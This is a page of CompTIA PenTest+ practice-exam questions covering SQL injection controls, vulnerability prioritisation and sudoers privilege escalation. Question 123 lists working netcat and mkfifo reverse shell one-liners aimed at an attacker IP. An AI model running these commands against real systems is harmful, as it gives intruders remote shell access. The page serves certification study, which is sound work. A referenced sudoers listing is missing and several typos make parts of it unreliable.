Free Access CompTIA.PT0-001.v2022-01-15.q208 Practice Test (Page 26)

Question 121

During testing, a critical vulnerability is discovered on a client's core server. Which of the following should be the NEXT action?

A.Disable the network port of the affected service.

B.Complete all findings, and then submit them to the client.

C.Take the target offline so it cannot be exploited by an attacker.

D.Promptly alert the client with details of the finding.

Question 122

A recently concluded penetration test revealed that a legacy web application is vulnerable lo SQL injection Research indicates that completely remediating the vulnerability would require an architectural change, and the stakeholders are not m a position to risk the availability of the application Under such circumstances, which of the following controls are low-effort, short-term solutions to minimize the SQL injection risk? (Select TWO).

A.Identity and eliminate inline SQL statements from the code.

B.Identify and sanitize all user inputs.

C.Identify and eliminate dynamic SQL from stored procedures.

D.Use a whitelist approach for SQL statements.

E.Identify the source of malicious input and block the IP address.

F.Use a blacklist approach for SQL statements.

Question 123

During a web application assessment, a penetration tester discovers that arbitrary commands can be executed on the server. Wanting to take this attack one step further, the penetration tester begins to explore ways to gain a reverse shell back to the attacking machine at 192.168.1.5. Which of the following are possible ways to do so? (Select TWO).

A.nc 192.168.1.5 44444

B.nc -nlvp 44444 -e /bin/sh

C.rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 44444>/tmp/f

D.nc -e /bin/sh 192.168.1.5 44444

E.rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 444444>/tmp/f

F.rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.5.1 44444>/tmp/f

Question 124

A penetration tester reviews the scan results of a web application. Which of the following vulnerabilities is MOST critical and should be prioritized for exploitation?

A.Stored XSS

B.Fill path disclosure

C.Expired certificate

D.Clickjacking

Question 125

D18912E1457D5D1DDCBD40AB3BF70D5D
During the exploitation phase of a penetration test, a vulnerability is discovered that allows command execution on a Linux web server. A cursory review confirms the system access is only in a low-privilege user context: www-dat a. After reviewing, the following output from /etc/sudoers:

Which of the following users should be targeted for privilege escalation?

A.Jedwards, operator, bfranks, emann, OPERATOR, and ADMINS can execute commands useful for privilege escalation.

B.All users on the machine can execute privileged commands useful for privilege escalation.

C.Only members of the Linux admin group, OPERATORS, ADMINS, jedwards, and operator can execute privileged commands useful for privilege escalation.

D.Bfranks, emann, members of the Linux admin group, OPERATORS, and ADMINS can execute commands useful for privilege escalation.

Other Version: 4588CompTIA.PT0-001.v2022-06-28.q222; 55CompTIA.Ipassleader.PT0-001.v2021-11-19.by.hardy.149q.pdf

Latest Upload: 105OCEG.GRCP.v2025-09-11.q211; 104HP.HPE0-V27.v2025-09-11.q78; 118Oracle.1Z0-1057-23.v2025-09-10.q47; 151Google.Professional-Cloud-Network-Engineer.v2025-09-09.q179; 131SAP.C-S4EWM-2023.v2025-09-08.q83; 165TheSecOpsGroup.CNSP.v2025-09-08.q20; 223CFAInstitute.ESG-Investing.v2025-09-08.q173; 170PECB.ISO-IEC-27001-Lead-Implementer.v2025-09-06.q132; 150Salesforce.Data-Architect.v2025-09-05.q216; 144Adobe.AD0-E605.v2025-09-05.q50

Question 121

Question 122

Question 123

Question 124

Question 125

Download PDF File